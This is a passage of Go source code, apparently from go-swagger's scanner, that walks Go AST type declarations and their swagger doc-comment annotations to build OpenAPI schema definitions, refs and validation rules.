for i, d := range list {
interfaceSlice[i] = d
}
sv.current.Enum = interfaceSlice
}
type schemaDecl struct {
File *ast.File
Decl *ast.GenDecl
TypeSpec *ast.TypeSpec
GoName string
Name string
annotated bool
}
func newSchemaDecl(file *ast.File, decl *ast.GenDecl, ts *ast.TypeSpec) *schemaDecl {
sd := &schemaDecl{
File: file,
Decl: decl,
TypeSpec: ts,
}
sd.inferNames()
return sd
}
func (sd *schemaDecl) hasAnnotation() bool {
sd.inferNames()
return sd.annotated
}
func (sd *schemaDecl) inferNames() (goName string, name string) {
if sd.GoName != "" {
goName, name = sd.GoName, sd.Name
return
}
goName = sd.TypeSpec.Name.Name
name = goName
if sd.Decl.Doc != nil {
DECLS:
for _, cmt := range sd.Decl.Doc.List {
for _, ln := range strings.Split(cmt.Text, "\n") {
matches := rxModelOverride.FindStringSubmatch(ln)
if len(matches) > 0 {
sd.annotated = true
}
if len(matches) > 1 && len(matches[1]) > 0 {
name = matches[1]
break DECLS
}
}
}
}
sd.GoName = goName
sd.Name = name
return
}
type schemaParser struct {
program *loader.Program
postDecls []schemaDecl
known map[string]spec.Schema
discovered *schemaDecl
}
func newSchemaParser(prog *loader.Program) *schemaParser {
scp := new(schemaParser)
scp.program = prog
scp.known = make(map[string]spec.Schema)
return scp
}
func (scp *schemaParser) Parse(gofile *ast.File, target interface{}) error {
tgt := target.(map[string]spec.Schema)
for _, decl := range gofile.Decls {
gd, ok := decl.(*ast.GenDecl)
if !ok {
continue
}
for _, spc := range gd.Specs {
if ts, ok := spc.(*ast.TypeSpec); ok {
sd := newSchemaDecl(gofile, gd, ts)
if err := scp.parseDecl(tgt, sd); err != nil {
return err
}
}
}
}
return nil
}
func (scp *schemaParser) parseDecl(definitions map[string]spec.Schema, decl *schemaDecl) error {
// check if there is a swagger:model tag that is followed by a word,
// this word is the type name for swagger
// the package and type are recorded in the extensions
// once type name is found convert it to a schema, by looking up the schema in the
// definitions dictionary that got passed into this parse method
// if our schemaParser is parsing a discovered schemaDecl and it does not match
// the current schemaDecl we can skip parsing.
if scp.discovered != nil && scp.discovered.Name != decl.Name {
return nil
}
decl.inferNames()
schema := definitions[decl.Name]
schPtr := &schema
// analyze doc comment for the model
sp := new(sectionedParser)
sp.setTitle = func(lines []string) { schema.Title = joinDropLast(lines) }
sp.setDescription = func(lines []string) { schema.Description = joinDropLast(lines) }
if err := sp.Parse(decl.Decl.Doc); err != nil {
return err
}
// if the type is marked to ignore, just return
if sp.ignored {
return nil
}
// analyze struct body for fields etc
// each exported struct field:
// * gets a type mapped to a go primitive
// * perhaps gets a format
// * has to document the validations that apply for the type and the field
// * when the struct field points to a model it becomes a ref: #/definitions/ModelName
// * the first line of the comment is the title
// * the following lines are the description
switch tpe := decl.TypeSpec.Type.(type) {
case *ast.StructType:
if err := scp.parseStructType(decl.File, schPtr, tpe, make(map[string]string)); err != nil {
return err
}
case *ast.InterfaceType:
if err := scp.parseInterfaceType(decl.File, schPtr, tpe, make(map[string]string)); err != nil {
return err
}
case *ast.Ident:
prop := &schemaTypable{schPtr, 0}
if strfmtName, ok := strfmtName(decl.Decl.Doc); ok {
prop.Typed("string", strfmtName)
} else {
if err := scp.parseNamedType(decl.File, tpe, prop); err != nil {
return err
}
}
case *ast.SelectorExpr:
prop := &schemaTypable{schPtr, 0}
if strfmtName, ok := strfmtName(decl.Decl.Doc); ok {
prop.Typed("string", strfmtName)
} else {
if err := scp.parseNamedType(decl.File, tpe, prop); err != nil {
return err
}
}
case *ast.ArrayType:
prop := &schemaTypable{schPtr, 0}
if strfmtName, ok := strfmtName(decl.Decl.Doc); ok {
prop.Items().Typed("string", strfmtName)
} else {
if err := scp.parseNamedType(decl.File, tpe, &schemaTypable{schPtr, 0}); err != nil {
return err
}
}
case *ast.MapType:
prop := &schemaTypable{schPtr, 0}
if strfmtName, ok := strfmtName(decl.Decl.Doc); ok {
prop.AdditionalProperties().Typed("string", strfmtName)
} else {
if err := scp.parseNamedType(decl.File, tpe, &schemaTypable{schPtr, 0}); err != nil {
return err
}
}
default:
log.Printf("WARNING: Missing parser for a %T, skipping model: %s\n", tpe, decl.Name)
return nil
}
if schPtr.Ref.String() == "" {
if decl.Name != decl.GoName {
schPtr.AddExtension("x-go-name", decl.GoName)
}
for _, pkgInfo := range scp.program.AllPackages {
if pkgInfo.Importable {
for _, fil := range pkgInfo.Files {
if fil.Pos() == decl.File.Pos() {
schPtr.AddExtension("x-go-package", pkgInfo.Pkg.Path())
}
}
}
}
}
definitions[decl.Name] = schema
return nil
}
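// Sketch of a declaration parseDecl handles (hypothetical type, not from the
// original source):
//
//	// User is a user of the system.
//	//
//	// swagger:model user
//	type User struct {
//		Name string `json:"name"`
//	}
//
// The swagger:model annotation overrides the definition name ("user" rather
// than "User"), and parseDecl then records the Go name in the x-go-name
// extension.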
func (scp *schemaParser) parseNamedType(gofile *ast.File, expr ast.Expr, prop swaggerTypable) error {
switch ftpe := expr.(type) {
case *ast.Ident: // simple value
pkg, err := scp.packageForFile(gofile, ftpe)
if err != nil {
return err
}
return scp.parseIdentProperty(pkg, ftpe, prop)
case *ast.StarExpr: // pointer to something, optional by default
if err := scp.parseNamedType(gofile, ftpe.X, prop); err != nil {
return err
}
case *ast.ArrayType: // slice type
if err := scp.parseNamedType(gofile, ftpe.Elt, prop.Items()); err != nil {
return err
}
case *ast.StructType:
schema := prop.Schema()
if schema == nil {
return fmt.Errorf("items doesn't support embedded structs")
}
return scp.parseStructType(gofile, prop.Schema(), ftpe, make(map[string]string))
case *ast.SelectorExpr:
err := scp.typeForSelector(gofile, ftpe, prop)
return err
case *ast.MapType:
// check if key is a string type, if not print a message
// and skip the map property. Only maps with string keys can go into additional properties
sch := prop.Schema()
if sch == nil {
return fmt.Errorf("items doesn't support maps")
}
if keyIdent, ok := ftpe.Key.(*ast.Ident); sch != nil && ok {
if keyIdent.Name == "string" {
if sch.AdditionalProperties == nil {
sch.AdditionalProperties = new(spec.SchemaOrBool)
}
sch.AdditionalProperties.Allows = false
if sch.AdditionalProperties.Schema == nil {
sch.AdditionalProperties.Schema = new(spec.Schema)
}
if err := scp.parseNamedType(gofile, ftpe.Value, schemaTypable{sch.AdditionalProperties.Schema, 0}); err != nil {
return err
}
sch.Typed("object", "")
}
}
case *ast.InterfaceType:
prop.Schema().Typed("object", "")
default:
pos := "unknown file:unknown position"
if scp != nil {
if scp.program != nil {
if scp.program.Fset != nil {
pos = scp.program.Fset.Position(expr.Pos()).String()
}
}
}
return fmt.Errorf("expr (%s) is unsupported for a schema", pos)
}
return nil
}
func (scp *schemaParser) parseEmbeddedType(gofile *ast.File, schema *spec.Schema, expr ast.Expr, seenPreviously map[string]string) error {
switch tpe := expr.(type) {
case *ast.Ident:
// do lookup of type
// take primitives into account, they should result in an error for swagger
pkg, err := scp.packageForFile(gofile, tpe)
if err != nil {
return err
}
file, _, ts, err := findSourceFile(pkg, tpe.Name)
if err != nil {
return err
}
switch st := ts.Type.(type) {
case *ast.StructType:
return scp.parseStructType(file, schema, st, seenPreviously)
case *ast.InterfaceType:
return scp.parseInterfaceType(file, schema, st, seenPreviously)
default:
prop := &schemaTypable{schema, 0}
return scp.parseNamedType(gofile, st, prop)
}
case *ast.SelectorExpr:
// look up package, file and then type
pkg, err := scp.packageForSelector(gofile, tpe.X)
if err != nil {
return fmt.Errorf("embedded struct: %v", err)
}
file, _, ts, err := findSourceFile(pkg, tpe.Sel.Name)
if err != nil {
return fmt.Errorf("embedded struct: %v", err)
}
if st, ok := ts.Type.(*ast.StructType); ok {
return scp.parseStructType(file, schema, st, seenPreviously)
}
if st, ok := ts.Type.(*ast.InterfaceType); ok {
return scp.parseInterfaceType(file, schema, st, seenPreviously)
}
case *ast.StarExpr:
return scp.parseEmbeddedType(gofile, schema, tpe.X, seenPreviously)
default:
return fmt.Errorf(
"parseEmbeddedType: unsupported type %v at position %#v",
expr,
scp.program.Fset.Position(tpe.Pos()),
)
}
return fmt.Errorf("unable to resolve embedded struct for: %v", expr)
}
func (scp *schemaParser) parseAllOfMember(gofile *ast.File, schema *spec.Schema, expr ast.Expr, seenPreviously map[string]string) error {
// TODO: check if struct is annotated with swagger:model or known in the definitions otherwise
var pkg *loader.PackageInfo
var file *ast.File
var gd *ast.GenDecl
var ts *ast.TypeSpec
var err error
switch tpe := expr.(type) {
case *ast.Ident:
// do lookup of type
// take primitives into account, they should result in an error for swagger
pkg, err = scp.packageForFile(gofile, tpe)
if err != nil {
return err
}
file, gd, ts, err = findSourceFile(pkg, tpe.Name)
if err != nil {
return err
}
case *ast.SelectorExpr:
// look up package, file and then type
pkg, err = scp.packageForSelector(gofile, tpe.X)
if err != nil {
return fmt.Errorf("embedded struct: %v", err)
}
file, gd, ts, err = findSourceFile(pkg, tpe.Sel.Name)
if err != nil {
return fmt.Errorf("embedded struct: %v", err)
}
default:
return fmt.Errorf("unable to resolve allOf member for: %v", expr)
}
sd := newSchemaDecl(file, gd, ts)
if sd.hasAnnotation() && pkg.String() != "time" && ts.Name.Name != "Time" {
ref, err := spec.NewRef("#/definitions/" + sd.Name)
if err != nil {
return err
}
schema.Ref = ref
scp.postDecls = append(scp.postDecls, *sd)
} else {
switch st := ts.Type.(type) {
case *ast.StructType:
return scp.parseStructType(file, schema, st, seenPreviously)
case *ast.InterfaceType:
return scp.parseInterfaceType(file, schema, st, seenPreviously)
}
}
return nil
}
func (scp *schemaParser) parseInterfaceType(gofile *ast.File, bschema *spec.Schema, tpe *ast.InterfaceType, seenPreviously map[string]string) error {
if tpe.Methods == nil {
return nil
}
// first check if this has embedded interfaces, if so make sure to refer to those by ref
// when they are decorated with an allOf annotation
// go over the method list again and this time collect the nullary methods and parse the comments
// as if they are properties on a struct
var schema *spec.Schema
seenProperties := seenPreviously
hasAllOf := false
for _, fld := range tpe.Methods.List {
if len(fld.Names) == 0 {
// if this created an allOf property then we have to rejig the schema var
// because all the fields collected that aren't from embedded structs should go in
// their own proper schema
// first process embedded structs in order of embedding
if allOfMember(fld.Doc) {
hasAllOf = true
if schema == nil {
schema = new(spec.Schema)
}
var newSch spec.Schema
// when the embedded struct is annotated with swagger:allOf it will be used as allOf property
// otherwise the fields will just be included as normal properties
if err := scp.parseAllOfMember(gofile, &newSch, fld.Type, seenProperties); err != nil {
return err
}
if fld.Doc != nil {
for _, cmt := range fld.Doc.List {
for _, ln := range strings.Split(cmt.Text, "\n") {
matches := rxAllOf.FindStringSubmatch(ln)
ml := len(matches)
if ml > 1 {
mv := matches[ml-1]
if mv != "" {
bschema.AddExtension("x-class", mv)
}
}
}
}
}
bschema.AllOf = append(bschema.AllOf, newSch)
continue
}
var newSch spec.Schema
// when the embedded struct is annotated with swagger:allOf it will be used as allOf property
// otherwise the fields will just be included as normal properties
if err := scp.parseEmbeddedType(gofile, &newSch, fld.Type, seenProperties); err != nil {
return err
}
bschema.AllOf = append(bschema.AllOf, newSch)
hasAllOf = true
}
}
if schema == nil {
schema = bschema
}
// then add and possibly override values
if schema.Properties == nil {
schema.Properties = make(map[string]spec.Schema)
}
schema.Typed("object", "")
for _, fld := range tpe.Methods.List {
if mtpe, ok := fld.Type.(*ast.FuncType); ok && mtpe.Params.NumFields() == 0 && mtpe.Results.NumFields() == 1 {
gnm := fld.Names[0].Name
nm := gnm
if fld.Doc != nil {
for _, cmt := range fld.Doc.List {
for _, ln := range strings.Split(cmt.Text, "\n") {
matches := rxName.FindStringSubmatch(ln)
ml := len(matches)
if ml > 1 {
nm = matches[ml-1]
}
}
}
}
ps := schema.Properties[nm]
if err := parseProperty(scp, gofile, mtpe.Results.List[0].Type, schemaTypable{&ps, 0}); err != nil {
return err
}
if err := scp.createParser(nm, schema, &ps, fld).Parse(fld.Doc); err != nil {
return err
}
if ps.Ref.String() == "" && nm != gnm {
ps.AddExtension("x-go-name", gnm)
}
seenProperties[nm] = gnm
schema.Properties[nm] = ps
}
}
if schema != nil && hasAllOf && len(schema.Properties) > 0 {
bschema.AllOf = append(bschema.AllOf, *schema)
}
for k := range schema.Properties {
if _, ok := seenProperties[k]; !ok {
delete(schema.Properties, k)
}
}
return nil
}
func (scp *schemaParser) parseStructType(gofile *ast.File, bschema *spec.Schema, tpe *ast.StructType, seenPreviously map[string]string) error {
if tpe.Fields == nil {
return nil
}
var schema *spec.Schema
seenProperties := seenPreviously
hasAllOf := false
for _, fld := range tpe.Fields.List {
if len(fld.Names) == 0 {
_, ignore, err := parseJSONTag(fld)
if err != nil {
return err
}
if ignore {
continue
}
// if this created an allOf property then we have to rejig the schema var
// because all the fields collected that aren't from embedded structs should go in
// their own proper schema
// first process embedded structs in order of embedding
if allOfMember(fld.Doc) {
hasAllOf = true
if schema == nil {
schema = new(spec.Schema)
}
var newSch spec.Schema
// when the embedded struct is annotated with swagger:allOf it will be used as allOf property
// otherwise the fields will just be included as normal properties
if err := scp.parseAllOfMember(gofile, &newSch, fld.Type, seenProperties); err != nil {
return err
}
if fld.Doc != nil {
for _, cmt := range fld.Doc.List {
for _, ln := range strings.Split(cmt.Text, "\n") {
matches := rxAllOf.FindStringSubmatch(ln)
ml := len(matches)
if ml > 1 {
mv := matches[ml-1]
if mv != "" {
bschema.AddExtension("x-class", mv)
}
}
}
}
}
bschema.AllOf = append(bschema.AllOf, newSch)
continue
}
if schema == nil {
schema = bschema
}
// when the embedded struct is annotated with swagger:allOf it will be used as allOf property
// otherwise the fields will just be included as normal properties
if err := scp.parseEmbeddedType(gofile, schema, fld.Type, seenProperties); err != nil {
return err
}
}
}
if schema == nil {
schema = bschema
}
// then add and possibly override values
if schema.Properties == nil {
schema.Properties = make(map[string]spec.Schema)
}
schema.Typed("object", "")
for _, fld := range tpe.Fields.List {
if len(fld.Names) > 0 && fld.Names[0] != nil && fld.Names[0].IsExported() {
gnm := fld.Names[0].Name
nm, ignore, err := parseJSONTag(fld)
if err != nil {
return err
}
if ignore {
for seenTagName, seenFieldName := range seenPreviously {
if seenFieldName == gnm {
delete(schema.Properties, seenTagName)
break
}
}
continue
}
ps := schema.Properties[nm]
if err := parseProperty(scp, gofile, fld.Type, schemaTypable{&ps, 0}); err != nil {
return err
}
if strfmtName, ok := strfmtName(fld.Doc); ok {
ps.Typed("string", strfmtName)
ps.Ref = spec.Ref{}
}
if err := scp.createParser(nm, schema, &ps, fld).Parse(fld.Doc); err != nil {
return err
}
if ps.Ref.String() == "" && nm != gnm {
ps.AddExtension("x-go-name", gnm)
}
// we have 2 cases:
// 1. field with different name override tag
// 2. field with different name removes tag
// so we need to save both tag&name
seenProperties[nm] = gnm
schema.Properties[nm] = ps
}
}
if schema != nil && hasAllOf && len(schema.Properties) > 0 {
bschema.AllOf = append(bschema.AllOf, *schema)
}
for k := range schema.Properties {
if _, ok := seenProperties[k]; !ok {
delete(schema.Properties, k)
}
}
return nil
}
func (scp *schemaParser) createParser(nm string, schema, ps *spec.Schema, fld *ast.Field) *sectionedParser {
sp := new(sectionedParser)
schemeType, err := ps.Type.MarshalJSON()
if err != nil {
return nil
}
if ps.Ref.String() == "" {
sp.setDescription = func(lines []string) { ps.Description = joinDropLast(lines) }
sp.taggers = []tagParser{
newSingleLineTagParser("maximum", &setMaximum{schemaValidations{ps}, rxf(rxMaximumFmt, "")}),
newSingleLineTagParser("minimum", &setMinimum{schemaValidations{ps}, rxf(rxMinimumFmt, "")}),
newSingleLineTagParser("multipleOf", &setMultipleOf{schemaValidations{ps}, rxf(rxMultipleOfFmt, "")}),
newSingleLineTagParser("minLength", &setMinLength{schemaValidations{ps}, rxf(rxMinLengthFmt, "")}),
newSingleLineTagParser("maxLength", &setMaxLength{schemaValidations{ps}, rxf(rxMaxLengthFmt, "")}),
newSingleLineTagParser("pattern", &setPattern{schemaValidations{ps}, rxf(rxPatternFmt, "")}),
newSingleLineTagParser("minItems", &setMinItems{schemaValidations{ps}, rxf(rxMinItemsFmt, "")}),
newSingleLineTagParser("maxItems", &setMaxItems{schemaValidations{ps}, rxf(rxMaxItemsFmt, "")}),
newSingleLineTagParser("unique", &setUnique{schemaValidations{ps}, rxf(rxUniqueFmt, "")}),
newSingleLineTagParser("enum", &setEnum{schemaValidations{ps}, rxf(rxEnumFmt, "")}),
newSingleLineTagParser("default", &setDefault{&spec.SimpleSchema{Type: string(schemeType)}, schemaValidations{ps}, rxf(rxDefaultFmt, "")}),
newSingleLineTagParser("required", &setRequiredSchema{schema, nm}),
newSingleLineTagParser("readOnly", &setReadOnlySchema{ps}),
newSingleLineTagParser("discriminator", &setDiscriminator{schema, nm}),
}
itemsTaggers := func(items *spec.Schema, level int) []tagParser {
schemeType, err := items.Type.MarshalJSON()
if err != nil {
return nil
}
			// the expression is 1-indexed, not 0-indexed
itemsPrefix := fmt.Sprintf(rxItemsPrefixFmt, level+1)
return []tagParser{
newSingleLineTagParser(fmt.Sprintf("items%dMaximum", level), &setMaximum{schemaValidations{items}, rxf(rxMaximumFmt, itemsPrefix)}),
newSingleLineTagParser(fmt.Sprintf("items%dMinimum", level), &setMinimum{schemaValidations{items}, rxf(rxMinimumFmt, itemsPrefix)}),
newSingleLineTagParser(fmt.Sprintf("items%dMultipleOf", level), &setMultipleOf{schemaValidations{items}, rxf(rxMultipleOfFmt, itemsPrefix)}),
newSingleLineTagParser(fmt.Sprintf("items%dMinLength", level), &setMinLength{schemaValidations{items}, rxf(rxMinLengthFmt, itemsPrefix)}),
newSingleLineTagParser(fmt.Sprintf("items%dMaxLength", level), &setMaxLength{schemaValidations{items}, rxf(rxMaxLengthFmt, itemsPrefix)}),
newSingleLineTagParser(fmt.Sprintf("items%dPattern", level), &setPattern{schemaValidations{items}, rxf(rxPatternFmt, itemsPrefix)}),
newSingleLineTagParser(fmt.Sprintf("items%dMinItems", level), &setMinItems{schemaValidations{items}, rxf(rxMinItemsFmt, itemsPrefix)}),
newSingleLineTagParser(fmt.Sprintf("items%dMaxItems", level), &setMaxItems{schemaValidations{items}, rxf(rxMaxItemsFmt, itemsPrefix)}),
newSingleLineTagParser(fmt.Sprintf("items%dUnique", level), &setUnique{schemaValidations{items}, rxf(rxUniqueFmt, itemsPrefix)}),
newSingleLineTagParser(fmt.Sprintf("items%dEnum", level), &setEnum{schemaValidations{items}, rxf(rxEnumFmt, itemsPrefix)}),
newSingleLineTagParser(fmt.Sprintf("items%dDefault", level), &setDefault{&spec.SimpleSchema{Type: string(schemeType)}, schemaValidations{items}, rxf(rxDefaultFmt, itemsPrefix)}),
}
}
var parseArrayTypes func(expr ast.Expr, items *spec.SchemaOrArray, level int) ([]tagParser, error)
parseArrayTypes = func(expr ast.Expr, items *spec.SchemaOrArray, level int) ([]tagParser, error) {
if items == nil || items.Schema == nil {
return []tagParser{}, nil
}
switch iftpe := expr.(type) {
case *ast.ArrayType:
eleTaggers := itemsTaggers(items.Schema, level)
sp.taggers = append(eleTaggers, sp.taggers...)
otherTaggers, err := parseArrayTypes(iftpe.Elt, items.Schema.Items, level+1)
if err != nil {
return nil, err
}
return otherTaggers, nil
case *ast.Ident:
taggers := []tagParser{}
if iftpe.Obj == nil {
taggers = itemsTaggers(items.Schema, level)
}
otherTaggers, err := parseArrayTypes(expr, items.Schema.Items, level+1)
if err != nil {
return nil, err
}
return append(taggers, otherTaggers...), nil
case *ast.StarExpr:
otherTaggers, err := parseArrayTypes(iftpe.X, items, level)
if err != nil {
return nil, err
}
return otherTaggers, nil
default:
return nil, fmt.Errorf("unknown field type ele for %q", nm)
}
}
// check if this is a primitive, if so parse the validations from the
// doc comments of the slice declaration.
if ftped, ok := fld.Type.(*ast.ArrayType); ok {
taggers, err := parseArrayTypes(ftped.Elt, ps.Items, 0)
if err != nil {
return sp
}
sp.taggers = append(taggers, sp.taggers...)
}
} else {
sp.taggers = []tagParser{
newSingleLineTagParser("required", &setRequiredSchema{schema, nm}),
}
}
return sp
}
// hasFilePathPrefix reports whether the filesystem path s begins with the
// elements in prefix.
//
// taken from: https://github.com/golang/go/blob/c87520c5981ecdeaa99e7ba636a6088f900c0c75/src/cmd/go/internal/load/path.go#L60-L80
func hasFilePathPrefix(s, prefix string) bool {
sv := strings.ToUpper(filepath.VolumeName(s))
pv := strings.ToUpper(filepath.VolumeName(prefix))
s = s[len(sv):]
prefix = prefix[len(pv):]
switch {
default:
return false
case sv != pv:
return false
case len(s) == len(prefix):
return s == prefix
case len(s) > len(prefix):
if prefix != "" && prefix[len(prefix)-1] == filepath.Separator {
return strings.HasPrefix(s, prefix)
}
return s[len(prefix)] == filepath.Separator && s[:len(prefix)] == prefix
}
}
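// Illustrative behaviour (hypothetical paths):
//
//	hasFilePathPrefix("/home/dev/go/src/foo/bar.go", "/home/dev/go/src") // true
//	hasFilePathPrefix("/home/dev/go/srcfoo", "/home/dev/go/src")         // false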
func (scp *schemaParser) packageForFile(gofile *ast.File, tpe *ast.Ident) (*loader.PackageInfo, error) {
fn := scp.program.Fset.File(gofile.Pos()).Name()
if Debug {
log.Println("trying for", fn)
}
fa, err := filepath.Abs(fn)
if err != nil {
return nil, err
}
if Debug {
log.Println("absolute path", fa)
}
var fgp string
gopath := os.Getenv("GOPATH")
if gopath == "" {
gopath = filepath.Join(os.Getenv("HOME"), "go")
}
for _, p := range append(filepath.SplitList(gopath), runtime.GOROOT()) {
pref := filepath.Join(p, "src")
if hasFilePathPrefix(fa, pref) {
fgp = filepath.Dir(strings.TrimPrefix(fa, pref))[1:]
break
}
}
if Debug {
log.Println("package in gopath", fgp)
}
for pkg, pkgInfo := range scp.program.AllPackages {
if Debug {
log.Println("inferring for", tpe.Name, "with", gofile.Name.Name, "at", pkg.Path(), "against", filepath.ToSlash(fgp))
}
if pkg.Name() == gofile.Name.Name && filepath.ToSlash(fgp) == pkg.Path() {
return pkgInfo, nil
}
}
return nil, fmt.Errorf("unable to determine package for %s", fn)
}
func (scp *schemaParser) packageForSelector(gofile *ast.File, expr ast.Expr) (*loader.PackageInfo, error) {
if pth, ok := expr.(*ast.Ident); ok {
// lookup import
var selPath string
for _, imp := range gofile.Imports {
pv, err := strconv.Unquote(imp.Path.Value)
if err != nil {
pv = imp.Path.Value
}
if imp.Name != nil {
if imp.Name.Name == pth.Name {
selPath = pv
break
}
} else {
pkg := scp.program.Package(pv)
if pkg != nil && pth.Name == pkg.Pkg.Name() {
selPath = pv
break
} else {
parts := strings.Split(pv, "/")
if len(parts) > 0 && parts[len(parts)-1] == pth.Name {
selPath = pv
break
}
}
}
}
// find actual struct
if selPath == "" {
return nil, fmt.Errorf("no import found for %s", pth.Name)
}
pkg := scp.program.Package(selPath)
if pkg != nil {
return pkg, nil
}
// TODO: I must admit this made me cry, it's not even a great solution.
pkg = scp.program.Package("github.com/go-swagger/go-swagger/vendor/" + selPath)
if pkg != nil {
return pkg, nil
}
for _, info := range scp.program.AllPackages {
n := info.String()
path := "/vendor/" + selPath
if strings.HasSuffix(n, path) {
pkg = scp.program.Package(n)
return pkg, nil
}
}
}
return nil, fmt.Errorf("can't determine selector path from %v", expr)
}
func (scp *schemaParser) makeRef(file *ast.File, pkg *loader.PackageInfo, gd *ast.GenDecl, ts *ast.TypeSpec, prop swaggerTypable) error {
sd := newSchemaDecl(file, gd, ts)
sd.inferNames()
// make an exception for time.Time because this is a well-known string format
if sd.Name == "Time" && pkg.String() == "time" {
return nil
}
ref, err := spec.NewRef("#/definitions/" + sd.Name)
if err != nil {
return err
}
prop.SetRef(ref)
scp.postDecls = append(scp.postDecls, *sd)
return nil
}
func (scp *schemaParser) parseIdentProperty(pkg *loader.PackageInfo, expr *ast.Ident, prop swaggerTypable) error {
// find the file this selector points to
file, gd, ts, err := findSourceFile(pkg, expr.Name)
if err != nil {
err := swaggerSchemaForType(expr.Name, prop)
if err != nil {
return fmt.Errorf("package %s, error is: %v", pkg.String(), err)
}
return nil
}
if at, ok := ts.Type.(*ast.ArrayType); ok {
// the swagger spec defines strfmt base64 as []byte.
// in that case we don't actually want to turn it into an array
// but we want to turn it into a string
if _, ok := at.Elt.(*ast.Ident); ok {
if strfmtName, ok := strfmtName(gd.Doc); ok {
prop.Typed("string", strfmtName)
return nil
}
}
// this is a selector, so most likely not base64
if strfmtName, ok := strfmtName(gd.Doc); ok {
prop.Items().Typed("string", strfmtName)
return nil
}
}
// look at doc comments for swagger:strfmt [name]
// when found this is the format name, create a schema with that name
if strfmtName, ok := strfmtName(gd.Doc); ok {
prop.Typed("string", strfmtName)
return nil
}
if enumName, ok := enumName(gd.Doc); ok {
log.Println(enumName)
return nil
}
if defaultName, ok := defaultName(gd.Doc); ok {
log.Println(defaultName)
return nil
}
if isAliasParam(prop) || aliasParam(gd.Doc) {
itype, ok := ts.Type.(*ast.Ident)
if ok {
err := swaggerSchemaForType(itype.Name, prop)
if err == nil {
return nil
}
}
}
switch tpe := ts.Type.(type) {
case *ast.ArrayType:
return scp.makeRef(file, pkg, gd, ts, prop)
case *ast.StructType:
return scp.makeRef(file, pkg, gd, ts, prop)
case *ast.Ident:
return scp.makeRef(file, pkg, gd, ts, prop)
case *ast.StarExpr:
return parseProperty(scp, file, tpe.X, prop)
case *ast.SelectorExpr:
// return scp.refForSelector(file, gd, tpe, ts, prop)
return scp.makeRef(file, pkg, gd, ts, prop)
case *ast.InterfaceType:
return scp.makeRef(file, pkg, gd, ts, prop)
case *ast.MapType:
return scp.makeRef(file, pkg, gd, ts, prop)
default:
err := swaggerSchemaForType(expr.Name, prop)
if err != nil {
return fmt.Errorf("package %s, error is: %v", pkg.String(), err)
}
return nil
}
}
func (scp *schemaParser) typeForSelector(gofile *ast.File, expr *ast.SelectorExpr, prop swaggerTypable) error {
pkg, err := scp.packageForSelector(gofile, expr.X)
if err != nil {
return err
}
return scp.parseIdentProperty(pkg, expr.Sel, prop)
}
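// findSourceFile scans every file in the package for the GenDecl/TypeSpec that declares typeName,
// also accepting declarations whose swagger:strfmt annotation matches the requested name.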
func findSourceFile(pkg *loader.PackageInfo, typeName string) (*ast.File, *ast.GenDecl, *ast.TypeSpec, error) {
for _, file := range pkg.Files {
for _, decl := range file.Decls {
if gd, ok := decl.(*ast.GenDecl); ok {
for _, gs := range gd.Specs {
if ts, ok := gs.(*ast.TypeSpec); ok {
strfmtNme, isStrfmt := strfmtName(gd.Doc)
if (isStrfmt && strfmtNme == typeName) || ts.Name != nil && ts.Name.Name == typeName {
return file, gd, ts, nil
}
}
}
}
}
}
return nil, nil, nil, fmt.Errorf("unable to find %s in %s", typeName, pkg.String())
}
func allOfMember(comments *ast.CommentGroup) bool {
if comments != nil {
for _, cmt := range comments.List {
for _, ln := range strings.Split(cmt.Text, "\n") {
if rxAllOf.MatchString(ln) {
return true
}
}
}
}
return false
}
func fileParam(comments *ast.CommentGroup) bool {
if comments != nil {
for _, cmt := range comments.List {
for _, ln := range strings.Split(cmt.Text, "\n") {
if rxFileUpload.MatchString(ln) {
return true
}
}
}
}
return false
}
func strfmtName(comments *ast.CommentGroup) (string, bool) {
if comments != nil {
for _, cmt := range comments.List {
for _, ln := range strings.Split(cmt.Text, "\n") {
matches := rxStrFmt.FindStringSubmatch(ln)
if len(matches) > 1 && len(strings.TrimSpace(matches[1])) > 0 {
return strings.TrimSpace(matches[1]), true
}
}
}
}
return "", false
}
func enumName(comments *ast.CommentGroup) (string, bool) {
if comments != nil {
for _, cmt := range comments.List {
for _, ln := range strings.Split(cmt.Text, "\n") {
matches := rxEnum.FindStringSubmatch(ln)
if len(matches) > 1 && len(strings.TrimSpace(matches[1])) > 0 {
return strings.TrimSpace(matches[1]), true
}
}
}
}
return "", false
}
func aliasParam(comments *ast.CommentGroup) bool {
if comments != nil {
for _, cmt := range comments.List {
for _, ln := range strings.Split(cmt.Text, "\n") {
if rxAlias.MatchString(ln) {
return true
}
}
}
}
return false
}
func defaultName(comments *ast.CommentGroup) (string, bool) {
if comments != nil {
for _, cmt := range comments.List {
for _, ln := range strings.Split(cmt.Text, "\n") {
matches := rxDefault.FindStringSubmatch(ln)
if len(matches) > 1 && len(strings.TrimSpace(matches[1])) > 0 {
return strings.TrimSpace(matches[1]), true
}
}
}
}
return "", false
}
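// parseProperty dispatches on the field's AST node: identifiers and selectors resolve to refs or
// primitives, pointers unwrap to their element type, slices recurse into Items, structs and
// string-keyed maps fill nested schemas, and interface{} becomes a plain object.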
func parseProperty(scp *schemaParser, gofile *ast.File, fld ast.Expr, prop swaggerTypable) error {
switch ftpe := fld.(type) {
case *ast.Ident: // simple value
pkg, err := scp.packageForFile(gofile, ftpe)
if err != nil {
return err
}
return scp.parseIdentProperty(pkg, ftpe, prop)
case *ast.StarExpr: // pointer to something, optional by default
if err := parseProperty(scp, gofile, ftpe.X, prop); err != nil {
return err
}
case *ast.ArrayType: // slice type
if err := parseProperty(scp, gofile, ftpe.Elt, prop.Items()); err != nil {
return err
}
case *ast.StructType:
schema := prop.Schema()
if schema == nil {
return fmt.Errorf("items doesn't support embedded structs")
}
return scp.parseStructType(gofile, prop.Schema(), ftpe, make(map[string]string))
case *ast.SelectorExpr:
err := scp.typeForSelector(gofile, ftpe, prop)
return err
case *ast.MapType:
// check if key is a string type, if not print a message
// and skip the map property. Only maps with string keys can go into additional properties
sch := prop.Schema()
if sch == nil {
return fmt.Errorf("items doesn't support maps")
}
if keyIdent, ok := ftpe.Key.(*ast.Ident); sch != nil && ok {
if keyIdent.Name == "string" {
if sch.AdditionalProperties == nil {
sch.AdditionalProperties = new(spec.SchemaOrBool)
}
sch.AdditionalProperties.Allows = false
if sch.AdditionalProperties.Schema == nil {
sch.AdditionalProperties.Schema = new(spec.Schema)
}
if err := parseProperty(scp, gofile, ftpe.Value, schemaTypable{sch.AdditionalProperties.Schema, 0}); err != nil {
return err
}
sch.Typed("object", "")
}
}
case *ast.InterfaceType:
prop.Schema().Typed("object", "")
default:
pos := "unknown file:unknown position"
if scp != nil {
